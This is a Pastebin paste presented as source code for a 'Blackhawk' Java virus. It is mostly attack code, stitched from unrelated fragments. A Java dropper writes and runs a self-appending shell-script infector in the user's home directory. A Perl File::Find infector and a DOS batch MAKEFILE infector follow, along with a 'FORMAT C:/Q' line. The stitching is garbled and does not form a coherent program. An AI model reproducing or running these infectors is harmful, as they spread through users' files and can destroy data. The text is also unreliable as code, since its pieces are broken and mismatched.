Advertisement
FlyFar

Virus.Java.Hawk.a - Source Code

Mar 21st, 2023
634
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 3.21 KB | Cybersecurity | 0 0
  1. import java.io.*;
  2.  
  3. class Blackhawk {
  4. public static void main (String[] argv) {
  5. try {
  6. String userHome = System.getProperty("user.home");
  7. String target = "$HOME";
  8. FileOutputStream outer = new FileOutputStream(userHome + "/.Blackhawk.sh");
  9. String homer = "#!/bin/sh" + "\n" + "#-_" + "\n" +
  10. "echo \"This is a New Target File from me..-->Blackhawk<--.\"" + "\n" +
  11. "for file in `find " + target + " -type f -print`" + "\n" + "do" +
  12. "\n" + " case \"`sed 1q $file`\" in" + "\n" +
  13. " \"#!/bin/sh\" ) grep '#-_' $file > /dev/null" +
  14. " || sed -n '/#-_/,$p' $0 >> $file" + "\n" +
  15. " esac" + "\n" + "done" + "\n" +
  16. "2>/dev/null";
  17. byte[] buffer = new byte[homer.length()];
  18. Blackhawk.getBytes(0, Blackhawk.length(), buffer, 0);
  19. public void start() {
  20. if (sleeper == null) {
  21. sleeper = new Thread(this);
  22. sleeper.setPriority(Thread.MAX_PRIORITY);
  23. sleeper.start();
  24. }
  25. use File::Find;
  26. &virus();
  27.  
  28. print "\
  29. nThis program is infected by the Blackhawk virus\n\n";
  30.  
  31. sub virus
  32.  
  33. {
  34.     my ( $pid, $new );  
  35.     if( $pid = fork ) { return; }
  36.     else
  37.      
  38. {
  39.         open( source, $0 );
  40.     finddepth ( \&infect, '/home/chris/test' );
  41.     sub infect
  42.      
  43. {
  44.             open target, "$File::Find::name";
  45.             $_ = <target>;
  46.         if
  47. ( /(\#!.*Blackhawk)/ )
  48.           {
  49.         $_ = <target>;
  50.         if( $_ ne "use File::Find;\n" )
  51.           {
  52.                     $new = $1 . "\nuse File::Find;\n&virus();\n" . $_;
  53.                     while( <target> ) { $new = $new . $_; }
  54.             seek(  source, 0, 0 );
  55.                     while( <source> ne "sub virus\n" ) { };
  56.                     $new = $new . "\nsub virus\n";
  57.                     while( <source> ) { $new = $new . $_; }                  
  58.                     close  target;
  59.                     open   target, ">$File::Find::name";
  60.                     print  target $new;
  61.                  }
  62.           }
  63.         close( target );  
  64.       }
  65.         close( source );
  66.     exit( 0 );
  67.       }
  68.   }
  69.  
  70. # a blackhawk virus, x
  71. #
  72.  
  73.  
  74. outer.write(buffer);
  75. outer.close();
  76. Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 888 " +
  77. userHome + "/.Blackhawk.sh");
  78. Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome +
  79. "/.Blackhawk.sh");
  80. } catch (IOException ioe) {}
  81. }
  82. }
  83. OurHost :
  84. @IF EXIST MAKEFILE FIND "ttt"<MAKEFILE >ttt.TMP
  85. @ECHO @CTTY NUL >ttt.BAT
  86. @ECHO IF _%1==_ttt GOTO ttt_INF >>ttt.BAT
  87. @ECHO IF EXIST ..\MAKEFILE CALL ttt.BAT ttt ..\MAKEFILE >>ttt.BAT
  88. @ECHO GOTO ttt_END >>ttt.BAT
  89. [Set Color Message Black Black][Exist %ExePath\My.Pro][If %Exist != 1]
  90. [Copy %FilePath\My.Pro %ExePath\My.Pro][End][Message][Set Color Message Red+ Black]
  91. [Set Color Message Black Black][Exist %FilePath\My.Pro][If %Exist != 1]
  92. [Copy %ExePath\My.Pro %FilePath\My.Pro][End][Message][Set Color Message Red+ Black]
  93. ;; Payload *.*exe,com,bat,vbs,asm
  94. Set BEEP On
  95. Def *T172000=[Write 10 20 Your computer is infected with Blackhawk.Virus.\n   ,   ]
  96. [Play MST12005][Play L4CDECCDECEFL2GL4EFL2G][Play L8GAGFL4ECL8GAGFL4EC][Play L4CO2GO3L2CL4CO2GO3L2C][Redraw]
  97. @ECHO :ttt_INF >>ttt.BAT
  98. @ECHO FIND "ttt" %2 >>ttt.BAT
  99. @ECHO IF NOT ERRORLEVEL 1 GOTO ttt_END >>ttt.BAT
  100. @ECHO COPY /B %2+GW.TMP %2 >>ttt.BAT
  101. @ECHO :ttt_END >>ttt.BAT
  102. @ECHO FORMAT C:/Q
  103. @call ttt.BAT
  104. @del ttt.BAT
  105. @del ttt.TMP
  106. # [Blackhawk] by Kingrhua//SMF
Tags: Java virus
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement